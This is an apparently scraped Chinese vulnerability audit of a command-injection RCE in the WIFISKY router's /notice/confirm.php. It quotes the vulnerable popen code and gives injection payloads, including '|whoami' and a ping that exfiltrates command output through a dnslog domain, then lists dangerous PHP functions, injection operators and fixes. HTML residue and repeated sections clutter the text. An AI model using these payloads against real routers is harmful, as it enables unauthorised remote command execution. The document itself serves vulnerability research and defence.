WIFISKY 7层流控路由器前台RCE漏洞审计分析<\/h1>

一、漏洞概述<\/h2>
本文详细分析WIFISKY 7层流控路由器中存在的前台命令执行漏洞(RCE)。该漏洞位于`\/notice\/confirm.php<\/code>文件中，由于未对用户输入进行有效过滤，导致攻击者可以在未授权的情况下执行任意系统命令。<\/p>`

二、漏洞原理<\/h2>
1. 漏洞代码分析<\/h3>
漏洞存在于\/notice\/confirm.php<\/code>文件中，关键代码如下：<\/p>
<?<\/span> 
<\/span><\/span>$ip =<\/span> $_SERVER['REMOTE_ADDR'<\/span>]; 
<\/span><\/span>$type =<\/span> $_GET['t'<\/span>]; 
<\/span><\/span>
<\/span><\/span>$file =<\/span> @<\/span>popen<\/span>("\/usr\/hls\/bin\/notice s <\/span>$ip<\/span> <\/span>$type<\/span>"<\/span>, "r"<\/span>); 
<\/span><\/span>if<\/span> ($file) pclose<\/span>($file); 
<\/span><\/span>
<\/span><\/span>exit<\/span>; 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. 漏洞成因<\/h3>

未授权访问<\/strong>：该文件未包含鉴权代码，允许未认证用户访问<\/li>
危险函数使用<\/strong>：使用了popen()<\/code>函数执行系统命令<\/li>
输入未过滤<\/strong>：$_GET['t']<\/code>参数直接拼接到命令中，未进行任何过滤处理<\/li>
命令注入<\/strong>：攻击者可以通过管道符|<\/code>注入额外命令<\/li>
<\/ol>
三、漏洞利用方法<\/h2>
1. 利用管道符进行命令注入<\/h3>
Linux管道符|<\/code>可以将多个命令连接起来，前一个命令的输出作为后一个命令的输入。利用这一点可以注入额外命令：<\/p>
\/notice\/confirm.php?t=|whoami
<\/code><\/pre>
2. 无回显命令执行验证<\/h3>
当命令执行无回显时，可以通过DNS外带技术验证：<\/p>

使用DNSLog平台获取临时域名(如：xxx.dnslog.cn)<\/li>
构造payload执行ping命令：<\/li>
<\/ol>
\/notice\/confirm.php?t=|ping `whoami`.xxx.dnslog.cn
<\/code><\/pre>

如果存在漏洞，DNSLog平台会收到解析请求，显示执行的命令结果<\/li>
<\/ol>
四、审计方法论<\/h2>
1. 审计目标筛选原则<\/h3>

只审计前台功能，不审计后台<\/li>
只关注可能导致RCE的漏洞<\/li>
优先审计无鉴权的文件<\/li>
<\/ol>
2. PHP危险函数列表<\/h3>
审计时应重点检查以下可能导致命令执行的函数：<\/p>

eval()<\/code><\/li>
assert()<\/code><\/li>
call_user_func()<\/code><\/li>
create_function()<\/code><\/li>
array_map()<\/code><\/li>
call_user_func_array()<\/code><\/li>
system()<\/code><\/li>
passthru()<\/code><\/li>
exec()<\/code><\/li>
pcntl_exec()<\/code><\/li>
shell_exec()<\/code><\/li>
popen()<\/code><\/li>
proc_open()<\/code><\/li>
<\/ul>
3. 命令执行漏洞产生条件<\/h3>

使用了上述危险函数<\/li>
函数参数用户可控<\/li>
缺乏有效的输入过滤<\/li>
接口权限校验缺失<\/li>
<\/ol>
五、漏洞修复建议<\/h2>

输入验证<\/strong>：对$_GET['t']<\/code>参数进行严格过滤，只允许预期的字符<\/li>
使用安全函数<\/strong>：使用escapeshellarg()<\/code>或escapeshellcmd()<\/code>处理命令参数<\/li>
权限控制<\/strong>：添加鉴权机制，确保只有授权用户能访问<\/li>
最小权限原则<\/strong>：Web服务器运行用户应具有最小必要权限<\/li>
使用替代方案<\/strong>：考虑使用更安全的PHP函数替代直接执行系统命令<\/li>
<\/ol>
六、扩展知识<\/h2>
1. Linux管道符详解<\/h3>
管道符|<\/code>是Linux中强大的命令操作符，特点包括：<\/p>

连接多个命令<\/li>
前一个命令的输出作为后一个命令的输入<\/li>
只显示最后一个命令的输出<\/li>
常用于命令注入攻击<\/li>
<\/ul>
2. 无回显漏洞验证技术<\/h3>

DNS外带<\/strong>：通过DNS请求带出命令执行结果<\/li>
HTTP请求<\/strong>：使用curl\/wget将结果发送到攻击者服务器<\/li>
时间延迟<\/strong>：通过sleep<\/code>等命令造成可观测的时间延迟<\/li>
文件写入<\/strong>：将结果写入web目录可访问的文件中<\/li>
<\/ol>
3. 其他常见命令注入符号<\/h3>
除了管道符|<\/code>外，还需注意：<\/p>

;<\/code>：顺序执行多个命令<\/li>
&&<\/code>：前一个命令成功则执行下一个<\/li>
||<\/code>：前一个命令失败则执行下一个<\/li>
><\/code>、>><\/code>：重定向输出<\/li>
$()<\/code>：命令替换(等同于反引号)<\/li>
<\/ul>

WIFISKY 7层流控路由器前台RCE漏洞审计分析<\/h1>

一、漏洞概述<\/h2> 本文详细分析WIFISKY 7层流控路由器中存在的前台命令执行漏洞(RCE)。该漏洞位于\/notice\/confirm.php<\/code>文件中，由于未对用户输入进行有效过滤，导致攻击者可以在未授权的情况下执行任意系统命令。<\/p>

三、漏洞利用方法<\/h2>

四、审计方法论<\/h2>

六、扩展知识<\/h2>

一、漏洞概述<\/h2>
本文详细分析WIFISKY 7层流控路由器中存在的前台命令执行漏洞(RCE)。该漏洞位于`\/notice\/confirm.php<\/code>文件中，由于未对用户输入进行有效过滤，导致攻击者可以在未授权的情况下执行任意系统命令。<\/p>`